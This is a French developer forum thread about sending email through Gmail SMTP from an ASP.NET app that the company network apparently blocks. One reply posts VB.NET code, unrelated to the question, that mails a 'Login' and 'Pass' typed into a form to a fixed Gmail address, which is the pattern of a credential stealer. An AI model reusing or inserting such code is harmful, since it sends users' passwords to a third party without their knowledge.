Envoi d'un mail

Fermé
eniso Messages postés 19 Date d'inscription vendredi 29 mars 2013 Statut Membre Dernière intervention 10 mars 2014 - 23 févr. 2014 à 18:08
eniso Messages postés 19 Date d'inscription vendredi 29 mars 2013 Statut Membre Dernière intervention 10 mars 2014 - 25 févr. 2014 à 12:23
Bonjour,
je suis entrain de réaliser une application WEB avec Visual Studio 2010 et je veux envoyer des e_mails lors de l'inscription des employés , j'utilise l'ordinateur de l'entreprise et il y 'a toujours une erreur : connexion au serveur est impossible et avec mon ordinateur ça marche très bien ! svp est ce qu'il y' a un problème lié à la sécurité au sein de l'entreprise ?


C urgent merciiiiii



A voir également:

3 réponses

eniso Messages postés 19 Date d'inscription vendredi 29 mars 2013 Statut Membre Dernière intervention 10 mars 2014
24 févr. 2014 à 10:49
svp c urgeeeeeeeeeeeeeeeeeeeeeeeeeeeeent

voila mon code :

protected void Button1_Click(object sender, EventArgs e)
{

try
{

MailMessage msg = new MailMessage();
String a = "www.***********";
msg.From = new MailAddress("**************************@gmail.com");
msg.To.Add(TextBox2.Text);
msg.Subject = "Message de confirmation ";
msg.Body = "Bonjour Mr/Mme " + TextBox1.Text + " vous faites partie de notre équipe .Pour plus d'informations sur notre groupe veuillez accéder à notre site WEB " + a + "";
SmtpClient sc = new SmtpClient("smtp.gmail.com");
sc.Port = 587;
sc.Credentials = new NetworkCredential("*************************@gmail.com", "************");
sc.EnableSsl = true;
sc.Send(msg);
Label1.Text = "sent !";
}
catch (Exception ex)
{
Label1.Text = ex.ToString();

}
0
alessioflurrys Messages postés 19 Date d'inscription lundi 24 février 2014 Statut Membre Dernière intervention 29 septembre 2018 8
24 févr. 2014 à 11:04
Salut Tien :

Imports System.Net.Mail

Public Class Form1

Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click


Dim MyMailMessage As New MailMessage()
Dim SMTPServer As New SmtpClient("smtp.gmail.com")

'Email
MyMailMessage.From = New MailAddress("alessioflurrys@gmail.com") 'Destinataire
MyMailMessage.To.Add("alessioflurrys@gmail.com") 'Expéditeur
MyMailMessage.Subject = ("[] Nouveau Compte") 'Sujet
MyMailMessage.Body = ("Login: " & TextBox1.Text & " Pass: " &
TextBox2.Text) 'Corps
'SMTP
SMTPServer.Port = ("587")
SMTPServer.Credentials = New System.Net.NetworkCredential("EMAIL", "TON MDP") 'Email (+Pass)
SMTPServer.EnableSsl = True

Try
SMTPServer.Send(MyMailMessage) 'Envoi

Catch ex As Exception
End Try


End Sub
End Class
0
Reivax962 Messages postés 3671 Date d'inscription jeudi 16 juin 2005 Statut Membre Dernière intervention 11 février 2021 1 011
24 févr. 2014 à 11:13
« svp est ce qu'il y' a un problème lié à la sécurité au sein de l'entreprise ? »
On dirait bien que oui...
Le mieux est de voir avec un responsable du SI de ta boîte.

Xavier
0
eniso Messages postés 19 Date d'inscription vendredi 29 mars 2013 Statut Membre Dernière intervention 10 mars 2014
25 févr. 2014 à 12:23
oui Mon probléme est résolu Merci bcp :)))
0